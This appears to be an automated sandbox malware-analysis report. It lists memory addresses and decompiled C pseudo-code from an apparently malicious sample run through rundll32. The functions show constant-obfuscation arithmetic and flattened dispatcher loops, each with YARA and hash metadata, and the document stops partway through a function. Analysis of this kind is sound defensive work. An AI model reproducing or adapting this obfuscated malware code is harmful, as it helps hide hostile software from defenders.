                                                                                                                      0x002c09c0
                                                                                                                      0x002c09c4
                                                                                                                      0x002c09c9
                                                                                                                      0x002c09d1
                                                                                                                      0x002c09d9
                                                                                                                      0x002c09e9
                                                                                                                      0x002c09ed
                                                                                                                      0x002c09f5
                                                                                                                      0x002c09fd
                                                                                                                      0x002c0a0a
                                                                                                                      0x002c0a0d
                                                                                                                      0x002c0a11
                                                                                                                      0x002c0a19
                                                                                                                      0x002c0a21
                                                                                                                      0x002c0a26
                                                                                                                      0x002c0a2e
                                                                                                                      0x002c0a36
                                                                                                                      0x002c0a43
                                                                                                                      0x002c0a47
                                                                                                                      0x002c0a4f
                                                                                                                      0x002c0a54
                                                                                                                      0x002c0a5c
                                                                                                                      0x002c0a64
                                                                                                                      0x002c0a6c
                                                                                                                      0x002c0a70
                                                                                                                      0x002c0a78
                                                                                                                      0x002c0a80
                                                                                                                      0x002c0a85
                                                                                                                      0x002c0a8d
                                                                                                                      0x002c0a95
                                                                                                                      0x002c0a9d
                                                                                                                      0x002c0aa5
                                                                                                                      0x002c0aad
                                                                                                                      0x002c0aba
                                                                                                                      0x002c0abd
                                                                                                                      0x002c0ac1
                                                                                                                      0x002c0ac9
                                                                                                                      0x002c0ad9
                                                                                                                      0x002c0ae1
                                                                                                                      0x002c0ae6
                                                                                                                      0x002c0aea
                                                                                                                      0x002c0af2
                                                                                                                      0x002c0afa
                                                                                                                      0x002c0b02
                                                                                                                      0x002c0b0d
                                                                                                                      0x002c0b12
                                                                                                                      0x002c0b16
                                                                                                                      0x002c0b1e
                                                                                                                      0x002c0b26
                                                                                                                      0x002c0b2e
                                                                                                                      0x002c0b36
                                                                                                                      0x002c0b3e
                                                                                                                      0x002c0b46
                                                                                                                      0x002c0b4e
                                                                                                                      0x002c0b56
                                                                                                                      0x002c0b5e
                                                                                                                      0x002c0b71
                                                                                                                      0x002c0b75
                                                                                                                      0x002c0b7d
                                                                                                                      0x002c0b85
                                                                                                                      0x002c0b8d
                                                                                                                      0x002c0b95
                                                                                                                      0x002c0b9d
                                                                                                                      0x002c0ba5
                                                                                                                      0x002c0bad
                                                                                                                      0x002c0bb5
                                                                                                                      0x002c0bbd
                                                                                                                      0x002c0bc6
                                                                                                                      0x002c0bca
                                                                                                                      0x002c0bd2
                                                                                                                      0x002c0bda
                                                                                                                      0x002c0bdf
                                                                                                                      0x002c0bec
                                                                                                                      0x002c0bf0
                                                                                                                      0x002c0bf8
                                                                                                                      0x002c0c00
                                                                                                                      0x002c0c08
                                                                                                                      0x002c0c0d
                                                                                                                      0x002c0c15
                                                                                                                      0x002c0c1d
                                                                                                                      0x002c0c1d
                                                                                                                      0x002c0c2b
                                                                                                                      0x00000000
                                                                                                                      0x002c0d2a
                                                                                                                      0x002c0c37
                                                                                                                      0x002c0c84
                                                                                                                      0x002c0c96
                                                                                                                      0x002c0c9b
                                                                                                                      0x002c0c9e
                                                                                                                      0x002c0ca1
                                                                                                                      0x002c0ca3
                                                                                                                      0x002c0cbb
                                                                                                                      0x002c0ccc
                                                                                                                      0x002c0ccf
                                                                                                                      0x002c0cd4
                                                                                                                      0x002c0cd7
                                                                                                                      0x00000000
                                                                                                                      0x002c0cd7
                                                                                                                      0x002c0c39
                                                                                                                      0x002c0c3f
                                                                                                                      0x002c0c7d
                                                                                                                      0x00000000
                                                                                                                      0x002c0c41
                                                                                                                      0x002c0c47
                                                                                                                      0x00000000
                                                                                                                      0x002c0c4d
                                                                                                                      0x002c0c61
                                                                                                                      0x002c0c66
                                                                                                                      0x002c0c6b
                                                                                                                      0x002c0c6e
                                                                                                                      0x002c0c73
                                                                                                                      0x002c0c79
                                                                                                                      0x00000000
                                                                                                                      0x002c0c79
                                                                                                                      0x002c0c73
                                                                                                                      0x002c0c47
                                                                                                                      0x002c0c3f
                                                                                                                      0x002c0d32
                                                                                                                      0x00000000
                                                                                                                      0x002c0d32
                                                                                                                      0x002c0ce8
                                                                                                                      0x002c0cec
                                                                                                                      0x002c0cf1
                                                                                                                      0x002c0cf4
                                                                                                                      0x002c0cf7
                                                                                                                      0x002c0cf9
                                                                                                                      0x002c0d05
                                                                                                                      0x00000000
                                                                                                                      0x002c0cfb
                                                                                                                      0x002c0cfb
                                                                                                                      0x00000000
                                                                                                                      0x002c0cfb
                                                                                                                      0x00000000
                                                                                                                      0x002c0d07
                                                                                                                      0x002c0d07
                                                                                                                      0x002c0d07
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 34$BG?$_2$`E*$f\
                                                                                                                      • API String ID: 0-782548322
                                                                                                                      • Opcode ID: 1f1584736396cdcc228a14b3782ab50ca53e36bc3c4304feabb3e588698e1cc3
                                                                                                                      • Instruction ID: b1e83bfdb13cf88c73851aaacc8bb3a99151a6b113731fae451f5533fb788b7c
                                                                                                                      • Opcode Fuzzy Hash: 1f1584736396cdcc228a14b3782ab50ca53e36bc3c4304feabb3e588698e1cc3
                                                                                                                      • Instruction Fuzzy Hash: D8A13FB2918341DFC358CF24C88990BFBE1BBC4758F409A1EF59A96260D7B5DA58CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C561F Relevance: 6.4, Strings: 5, Instructions: 189COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002C561F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t181;
				signed int _t191;
				void* _t203;
				signed int _t204;
				signed int _t205;
				void* _t208;
				signed int _t218;
				intOrPtr* _t219;
				void* _t220;
				signed int* _t223;

				_t219 = _a8;
				_push(_t219);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t181);
				_v4 = _v4 & 0x00000000;
				_t223 =  &(( &_v92)[4]);
				_v12 = 0x6615d4;
				_v8 = 0x63ffda;
				_t220 = 0;
				_v28 = 0xf9afd3;
				_t208 = 0x31efc18;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x0001f35e;
				_v80 = 0xd84a57;
				_v80 = _v80 << 3;
				_t204 = 0x18;
				_v80 = _v80 * 0x2a;
				_v80 = _v80 + 0x45cf;
				_v80 = _v80 ^ 0x1be1d7fe;
				_v84 = 0xce5c8a;
				_v84 = _v84 + 0xa551;
				_v84 = _v84 * 0x57;
				_v84 = _v84 | 0xfd3f873a;
				_v84 = _v84 ^ 0xff78090e;
				_v52 = 0xb08f91;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 + 0xb2fa;
				_v52 = _v52 ^ 0x000b6173;
				_v56 = 0x674ce5;
				_v56 = _v56 + 0x398f;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 ^ 0x0001bfbd;
				_v88 = 0x67105a;
				_v88 = _v88 * 0x51;
				_v88 = _v88 ^ 0xbb721b0a;
				_v88 = _v88 ^ 0x493680b5;
				_v88 = _v88 ^ 0xd2dd6d54;
				_v60 = 0x6eef31;
				_v60 = _v60 << 6;
				_v60 = _v60 | 0x99e12062;
				_v60 = _v60 ^ 0x9bf73816;
				_v92 = 0x911a2f;
				_v92 = _v92 ^ 0xd10c2d91;
				_v92 = _v92 * 0x5e;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0xdd366504;
				_v64 = 0x3fcb13;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 * 6;
				_v64 = _v64 ^ 0x00005971;
				_v44 = 0xc7907a;
				_v44 = _v44 << 0xb;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x000cecb3;
				_v24 = 0x5cb13a;
				_v24 = _v24 | 0x9101a275;
				_v24 = _v24 ^ 0x91595ccd;
				_v48 = 0x23abf4;
				_v48 = _v48 / _t204;
				_v48 = _v48 << 2;
				_v48 = _v48 ^ 0x0009bb3e;
				_v68 = 0x8d9eb5;
				_v68 = _v68 >> 0x10;
				_v68 = _v68 + 0xf044;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x000dd2f9;
				_v20 = 0x3507ed;
				_v20 = _v20 + 0xe3ac;
				_v20 = _v20 ^ 0x00302855;
				_v32 = 0xacaccb;
				_v32 = _v32 ^ 0xc0e60235;
				_t205 = 0x4e;
				_v32 = _v32 * 0x53;
				_v32 = _v32 ^ 0x583b0f23;
				_v36 = 0x7d6507;
				_v36 = _v36 + 0xffff02b5;
				_t191 = _v36;
				_t218 = _t191 % _t205;
				_v36 = _t191 / _t205;
				_v36 = _v36 ^ 0x0005008b;
				_v40 = 0xd19b6c;
				_v40 = _v40 | 0xa0bb2537;
				_v40 = _v40 + 0xffff1d7c;
				_v40 = _v40 ^ 0xa0fa32c2;
				_v72 = 0xc60854;
				_v72 = _v72 | 0x85b2e473;
				_v72 = _v72 + 0x7f84;
				_v72 = _v72 * 0x36;
				_v72 = _v72 ^ 0x423e0813;
				_v76 = 0xd43520;
				_v76 = _v76 + 0x4339;
				_v76 = _v76 + 0xffffe1a4;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000c8c56;
				do {
					while(_t208 != 0x2557e54) {
						if(_t208 == 0x31efc18) {
							_t208 = 0xe841cef;
							continue;
						} else {
							if(_t208 == 0xa700901) {
								E002BB267(_a4, _t218, _v68,  &_v16, _v20, _t208, _v32, _t220, _v36, _v40, _t208, _v72, _v76, _v80);
								 *_t219 = _v16;
							} else {
								if(_t208 != 0xe841cef) {
									goto L11;
								} else {
									_t203 = E002BB267(_a4, _t218, _v84,  &_v16, _v52, _t208, _v56, 0, _v88, _v60, _t208, _v92, _v64, _v28);
									_t223 =  &(_t223[0xc]);
									if(_t203 != 0) {
										_t208 = 0x2557e54;
										continue;
									}
								}
							}
						}
						L14:
						return _t220;
					}
					_push(_t208);
					_push(_t208);
					_t220 = E002C3512(_v16);
					if(_t220 == 0) {
						_t208 = 0x2fabbe9;
						goto L11;
					} else {
						_t208 = 0xa700901;
						continue;
					}
					goto L14;
					L11:
				} while (_t208 != 0x2fabbe9);
				goto L14;
			}




































                                                                                                                      0x002c5626
                                                                                                                      0x002c562a
                                                                                                                      0x002c562b
                                                                                                                      0x002c562f
                                                                                                                      0x002c5630
                                                                                                                      0x002c5631
                                                                                                                      0x002c5636
                                                                                                                      0x002c563b
                                                                                                                      0x002c563e
                                                                                                                      0x002c5648
                                                                                                                      0x002c5650
                                                                                                                      0x002c5652
                                                                                                                      0x002c565a
                                                                                                                      0x002c565f
                                                                                                                      0x002c5664
                                                                                                                      0x002c566c
                                                                                                                      0x002c5674
                                                                                                                      0x002c5680
                                                                                                                      0x002c5681
                                                                                                                      0x002c5685
                                                                                                                      0x002c568d
                                                                                                                      0x002c5695
                                                                                                                      0x002c569d
                                                                                                                      0x002c56aa
                                                                                                                      0x002c56ae
                                                                                                                      0x002c56b6
                                                                                                                      0x002c56be
                                                                                                                      0x002c56c6
                                                                                                                      0x002c56cb
                                                                                                                      0x002c56d3
                                                                                                                      0x002c56db
                                                                                                                      0x002c56e3
                                                                                                                      0x002c56eb
                                                                                                                      0x002c56f0
                                                                                                                      0x002c56f8
                                                                                                                      0x002c5705
                                                                                                                      0x002c5709
                                                                                                                      0x002c5711
                                                                                                                      0x002c5719
                                                                                                                      0x002c5721
                                                                                                                      0x002c5729
                                                                                                                      0x002c572e
                                                                                                                      0x002c5736
                                                                                                                      0x002c573e
                                                                                                                      0x002c5746
                                                                                                                      0x002c5753
                                                                                                                      0x002c5757
                                                                                                                      0x002c575c
                                                                                                                      0x002c5764
                                                                                                                      0x002c576c
                                                                                                                      0x002c5776
                                                                                                                      0x002c577a
                                                                                                                      0x002c5782
                                                                                                                      0x002c578a
                                                                                                                      0x002c578f
                                                                                                                      0x002c5794
                                                                                                                      0x002c579c
                                                                                                                      0x002c57a4
                                                                                                                      0x002c57ac
                                                                                                                      0x002c57b4
                                                                                                                      0x002c57c2
                                                                                                                      0x002c57c6
                                                                                                                      0x002c57cb
                                                                                                                      0x002c57d3
                                                                                                                      0x002c57db
                                                                                                                      0x002c57e0
                                                                                                                      0x002c57e8
                                                                                                                      0x002c57ed
                                                                                                                      0x002c57f5
                                                                                                                      0x002c57ff
                                                                                                                      0x002c580c
                                                                                                                      0x002c5814
                                                                                                                      0x002c581c
                                                                                                                      0x002c582b
                                                                                                                      0x002c582c
                                                                                                                      0x002c5830
                                                                                                                      0x002c5838
                                                                                                                      0x002c5840
                                                                                                                      0x002c5848
                                                                                                                      0x002c584c
                                                                                                                      0x002c5853
                                                                                                                      0x002c5857
                                                                                                                      0x002c585f
                                                                                                                      0x002c5867
                                                                                                                      0x002c586f
                                                                                                                      0x002c5877
                                                                                                                      0x002c587f
                                                                                                                      0x002c5887
                                                                                                                      0x002c588f
                                                                                                                      0x002c589c
                                                                                                                      0x002c58a0
                                                                                                                      0x002c58a8
                                                                                                                      0x002c58b0
                                                                                                                      0x002c58b8
                                                                                                                      0x002c58c0
                                                                                                                      0x002c58c5
                                                                                                                      0x002c58cd
                                                                                                                      0x002c58cd
                                                                                                                      0x002c58d7
                                                                                                                      0x002c592d
                                                                                                                      0x00000000
                                                                                                                      0x002c58d9
                                                                                                                      0x002c58db
                                                                                                                      0x002c599c
                                                                                                                      0x002c59ab
                                                                                                                      0x002c58e1
                                                                                                                      0x002c58e7
                                                                                                                      0x00000000
                                                                                                                      0x002c58e9
                                                                                                                      0x002c5919
                                                                                                                      0x002c591e
                                                                                                                      0x002c5923
                                                                                                                      0x002c5929
                                                                                                                      0x00000000
                                                                                                                      0x002c5929
                                                                                                                      0x002c5923
                                                                                                                      0x002c58e7
                                                                                                                      0x002c58db
                                                                                                                      0x002c59ae
                                                                                                                      0x002c59b6
                                                                                                                      0x002c59b6
                                                                                                                      0x002c5940
                                                                                                                      0x002c5941
                                                                                                                      0x002c594b
                                                                                                                      0x002c5951
                                                                                                                      0x002c595a
                                                                                                                      0x00000000
                                                                                                                      0x002c5953
                                                                                                                      0x002c5953
                                                                                                                      0x00000000
                                                                                                                      0x002c5953
                                                                                                                      0x00000000
                                                                                                                      0x002c595f
                                                                                                                      0x002c595f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1n$9C$U(0$qY$Lg
                                                                                                                      • API String ID: 0-890920262
                                                                                                                      • Opcode ID: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction ID: fa7e99792e6a47446d1b4c6c96444f7caf86e90ed00c9712d4b2702d9608585f
                                                                                                                      • Opcode Fuzzy Hash: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction Fuzzy Hash: 06911EB14197819FC358CF65C58A91BFBF1FB94758F004A0DF2A686260D3B5DA98CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BC309 Relevance: 6.4, Strings: 5, Instructions: 174COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002BC309() {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _t177;
				void* _t180;
				void* _t183;
				intOrPtr _t190;
				intOrPtr _t192;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t213;

				_t213 =  &_v604;
				_v528 = _v528 & 0x00000000;
				_v532 = 0xe4831e;
				_t183 = 0x6eb28ed;
				_v552 = 0x1276c3;
				_v552 = _v552 ^ 0x42b4d72c;
				_v552 = _v552 + 0xf95f;
				_v552 = _v552 ^ 0x42a4cd0b;
				_v548 = 0x347a6a;
				_v548 = _v548 | 0x3256b11b;
				_v548 = _v548 ^ 0x3277037e;
				_v564 = 0x82dd46;
				_v564 = _v564 + 0xffffb28a;
				_v564 = _v564 << 0xf;
				_v564 = _v564 ^ 0x47e00e04;
				_v600 = 0xaa25ff;
				_v600 = _v600 << 0xd;
				_v600 = _v600 + 0xf5f3;
				_v600 = _v600 + 0xffff8f6c;
				_v600 = _v600 ^ 0x44cc5d5c;
				_v556 = 0x1132ac;
				_v556 = _v556 | 0x9b4d5b2d;
				_v556 = _v556 ^ 0x2eadc533;
				_v556 = _v556 ^ 0xb5fd7d8d;
				_v536 = 0x11628e;
				_v536 = _v536 * 0x4b;
				_v536 = _v536 ^ 0x051afcb6;
				_v584 = 0xa15265;
				_v584 = _v584 << 9;
				_t208 = 0x76;
				_v584 = _v584 / _t208;
				_t209 = 0x44;
				_v584 = _v584 * 0x30;
				_v584 = _v584 ^ 0x1b1be586;
				_v576 = 0xad5a3e;
				_v576 = _v576 | 0x6c06410f;
				_v576 = _v576 * 0xe;
				_v576 = _v576 ^ 0xf19bc2b8;
				_v540 = 0x7faa4f;
				_v540 = _v540 + 0xffff807e;
				_v540 = _v540 ^ 0x007d47f3;
				_v544 = 0x15cbe5;
				_v544 = _v544 | 0x222269e9;
				_v544 = _v544 ^ 0x2236b88c;
				_v592 = 0x7f48ca;
				_v592 = _v592 << 3;
				_v592 = _v592 / _t209;
				_v592 = _v592 | 0x6974e558;
				_v592 = _v592 ^ 0x697a9c68;
				_v568 = 0xdf464;
				_v568 = _v568 << 0xf;
				_v568 = _v568 | 0x68444ee0;
				_v568 = _v568 ^ 0xfa71a6c1;
				_v588 = 0x4eabc7;
				_v588 = _v588 >> 4;
				_v588 = _v588 ^ 0xdf4d904b;
				_v588 = _v588 + 0x3b02;
				_v588 = _v588 ^ 0xdf416162;
				_v596 = 0x2da8e3;
				_v596 = _v596 | 0xcaed8666;
				_v596 = _v596 + 0xffff0300;
				_v596 = _v596 ^ 0x5b73fee0;
				_v596 = _v596 ^ 0x9196765f;
				_v604 = 0x945bcd;
				_v604 = _v604 + 0xffffdd7c;
				_v604 = _v604 | 0x6dfc281c;
				_v604 = _v604 << 3;
				_v604 = _v604 ^ 0x6fe21eca;
				_v580 = 0xe4e766;
				_t122 =  &_v580; // 0xe4e766
				_t210 = 0x1c;
				_t177 =  *_t122 / _t210;
				_v580 = _t177;
				_v580 = _v580 + 0x73a9;
				_v580 = _v580 | 0xb028f1fa;
				_v580 = _v580 ^ 0xb0236f0a;
				_v572 = 0x26d4cb;
				_v572 = _v572 ^ 0xbda42e04;
				_v572 = _v572 << 8;
				_v572 = _v572 ^ 0x82f622a5;
				_v560 = 0x78c236;
				_v560 = _v560 | 0xc7202908;
				_v560 = _v560 >> 9;
				_v560 = _v560 ^ 0x0065a40e;
				do {
					while(_t183 != 0x6eb28ed) {
						if(_t183 == 0x7fdcf56) {
							return E002B1950(_v580, _v572, __eflags, 0,  &_v524,  &_v524, E002CD3C8, _v560);
						}
						if(_t183 == 0xb7324ef) {
							_t177 = E002C4FA8(_v588,  &_v524, _v596, _v604);
							 *_t177 = 0;
							_t183 = 0x7fdcf56;
							continue;
						}
						_t220 = _t183 - 0xb9bc25f;
						if(_t183 != 0xb9bc25f) {
							goto L8;
						}
						_push(_v600);
						_push(_v564);
						_push(0x2b10cc);
						_t180 = E002BAB66(_v552, _v548, _t220);
						_t190 =  *0x2d520c; // 0x0
						_t192 =  *0x2d520c; // 0x0
						E002BE7CE(_t180, _t220, _v556, _t192 + 8, _t190 + 0x220, _v536, _v584, _v576, _v540, _t190 + 0x220);
						_t177 = E002BAE03(_v544, _v592, _v568, _t180);
						_t213 =  &(_t213[0xd]);
						_t183 = 0xb7324ef;
					}
					_t183 = 0xb9bc25f;
					L8:
					__eflags = _t183 - 0x6d02df3;
				} while (__eflags != 0);
				return _t177;
			}

































                                                                                                                      0x002bc309
                                                                                                                      0x002bc313
                                                                                                                      0x002bc31a
                                                                                                                      0x002bc322
                                                                                                                      0x002bc327
                                                                                                                      0x002bc32f
                                                                                                                      0x002bc337
                                                                                                                      0x002bc33f
                                                                                                                      0x002bc347
                                                                                                                      0x002bc34f
                                                                                                                      0x002bc357
                                                                                                                      0x002bc35f
                                                                                                                      0x002bc367
                                                                                                                      0x002bc36f
                                                                                                                      0x002bc374
                                                                                                                      0x002bc37c
                                                                                                                      0x002bc384
                                                                                                                      0x002bc389
                                                                                                                      0x002bc391
                                                                                                                      0x002bc399
                                                                                                                      0x002bc3a1
                                                                                                                      0x002bc3a9
                                                                                                                      0x002bc3b1
                                                                                                                      0x002bc3b9
                                                                                                                      0x002bc3c1
                                                                                                                      0x002bc3ce
                                                                                                                      0x002bc3d2
                                                                                                                      0x002bc3da
                                                                                                                      0x002bc3e2
                                                                                                                      0x002bc3ed
                                                                                                                      0x002bc3f2
                                                                                                                      0x002bc3fd
                                                                                                                      0x002bc3fe
                                                                                                                      0x002bc402
                                                                                                                      0x002bc40a
                                                                                                                      0x002bc412
                                                                                                                      0x002bc41f
                                                                                                                      0x002bc423
                                                                                                                      0x002bc42b
                                                                                                                      0x002bc433
                                                                                                                      0x002bc43b
                                                                                                                      0x002bc443
                                                                                                                      0x002bc44b
                                                                                                                      0x002bc453
                                                                                                                      0x002bc45b
                                                                                                                      0x002bc463
                                                                                                                      0x002bc46e
                                                                                                                      0x002bc472
                                                                                                                      0x002bc47a
                                                                                                                      0x002bc482
                                                                                                                      0x002bc48a
                                                                                                                      0x002bc48f
                                                                                                                      0x002bc497
                                                                                                                      0x002bc49f
                                                                                                                      0x002bc4a7
                                                                                                                      0x002bc4ac
                                                                                                                      0x002bc4b4
                                                                                                                      0x002bc4bc
                                                                                                                      0x002bc4c4
                                                                                                                      0x002bc4cc
                                                                                                                      0x002bc4d4
                                                                                                                      0x002bc4dc
                                                                                                                      0x002bc4e4
                                                                                                                      0x002bc4ec
                                                                                                                      0x002bc4f4
                                                                                                                      0x002bc4fc
                                                                                                                      0x002bc504
                                                                                                                      0x002bc509
                                                                                                                      0x002bc513
                                                                                                                      0x002bc520
                                                                                                                      0x002bc52b
                                                                                                                      0x002bc52c
                                                                                                                      0x002bc533
                                                                                                                      0x002bc537
                                                                                                                      0x002bc53f
                                                                                                                      0x002bc547
                                                                                                                      0x002bc54f
                                                                                                                      0x002bc557
                                                                                                                      0x002bc55f
                                                                                                                      0x002bc564
                                                                                                                      0x002bc56c
                                                                                                                      0x002bc574
                                                                                                                      0x002bc57c
                                                                                                                      0x002bc581
                                                                                                                      0x002bc589
                                                                                                                      0x002bc589
                                                                                                                      0x002bc597
                                                                                                                      0x00000000
                                                                                                                      0x002bc66f
                                                                                                                      0x002bc59f
                                                                                                                      0x002bc62e
                                                                                                                      0x002bc637
                                                                                                                      0x002bc63a
                                                                                                                      0x00000000
                                                                                                                      0x002bc63a
                                                                                                                      0x002bc5a1
                                                                                                                      0x002bc5a3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bc5a9
                                                                                                                      0x002bc5ad
                                                                                                                      0x002bc5b9
                                                                                                                      0x002bc5be
                                                                                                                      0x002bc5c3
                                                                                                                      0x002bc5e8
                                                                                                                      0x002bc5fd
                                                                                                                      0x002bc60f
                                                                                                                      0x002bc614
                                                                                                                      0x002bc617
                                                                                                                      0x002bc617
                                                                                                                      0x002bc641
                                                                                                                      0x002bc643
                                                                                                                      0x002bc643
                                                                                                                      0x002bc643
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Xti$f$jz4$NDh$i""
                                                                                                                      • API String ID: 0-1033842094
                                                                                                                      • Opcode ID: 7c0c66b86cf6f08afdf16087ea495697f67d68cbd601a34ba3b3ed5b1ebf59d0
                                                                                                                      • Instruction ID: e79280dfb70b6d335483bc56b61ad2feaad5f5f184d5959eaf1ea7657e529789
                                                                                                                      • Opcode Fuzzy Hash: 7c0c66b86cf6f08afdf16087ea495697f67d68cbd601a34ba3b3ed5b1ebf59d0
                                                                                                                      • Instruction Fuzzy Hash: 0A8130710183419FC398CF64DA8A55FFBE1BBC4798F109A1DF19696260D3B48A19CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CD3C8 Relevance: 6.4, Strings: 5, Instructions: 167COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002CD3C8(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v616;
				void* _t202;
				void* _t203;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr _t226;

				_v88 = _v88 & 0x00000000;
				_v96 = 0x9df3e3;
				_v92 = 0x111c87;
				_v84 = 0xa084f0;
				_v84 = _v84 | 0x40312458;
				_v84 = _v84 ^ 0x40bb7f3e;
				_v16 = 0xcefd9d;
				_v16 = _v16 + 0xcd96;
				_t210 = 0x6a;
				_v16 = _v16 * 0xf;
				_v16 = _v16 * 0x19;
				_v16 = _v16 ^ 0x30695f7a;
				_v40 = 0x424711;
				_v40 = _v40 + 0x2590;
				_v40 = _v40 ^ 0x3a2a5382;
				_v40 = _v40 | 0x2443fe5b;
				_v40 = _v40 ^ 0x3e6f608b;
				_v72 = 0x627874;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 ^ 0x0000543e;
				_v32 = 0xe24590;
				_v32 = _v32 | 0xeb3a48f8;
				_v32 = _v32 << 7;
				_v32 = _v32 * 0x3c;
				_v32 = _v32 ^ 0x5522ca4e;
				_v48 = 0xd6f907;
				_v48 = _v48 << 1;
				_v48 = _v48 / _t210;
				_v48 = _v48 ^ 0x000b1c59;
				_v8 = 0xcfad9d;
				_v8 = _v8 << 0xa;
				_v8 = _v8 << 6;
				_v8 = _v8 + 0xffff7e6c;
				_v8 = _v8 ^ 0xad990d89;
				_v80 = 0x5a76f4;
				_v80 = _v80 << 1;
				_v80 = _v80 ^ 0x00be33e4;
				_v24 = 0x133aa1;
				_v24 = _v24 ^ 0xc65a4b7f;
				_v24 = _v24 * 0x1e;
				_v24 = _v24 * 0x13;
				_v24 = _v24 ^ 0x7f83be07;
				_v64 = 0x82e5fc;
				_v64 = _v64 + 0xffffc657;
				_v64 = _v64 ^ 0x008deef7;
				_v52 = 0x864f04;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0xeb96;
				_v52 = _v52 ^ 0xc9ef9c56;
				_v20 = 0x197ff2;
				_v20 = _v20 + 0xffff42c2;
				_v20 = _v20 + 0x3e6b;
				_v20 = _v20 ^ 0xe022d7dd;
				_v20 = _v20 ^ 0xe031a9ca;
				_v68 = 0x51f027;
				_v68 = _v68 ^ 0xb9085631;
				_v68 = _v68 ^ 0xb9589630;
				_v56 = 0x8df2a2;
				_v56 = _v56 ^ 0x4cb2f0be;
				_v56 = _v56 ^ 0x0e08f962;
				_v56 = _v56 ^ 0x42319e50;
				_v12 = 0x46739a;
				_v12 = _v12 + 0x8337;
				_v12 = _v12 + 0xd158;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xf903dec7;
				_v36 = 0x3dfdbe;
				_v36 = _v36 * 0x2f;
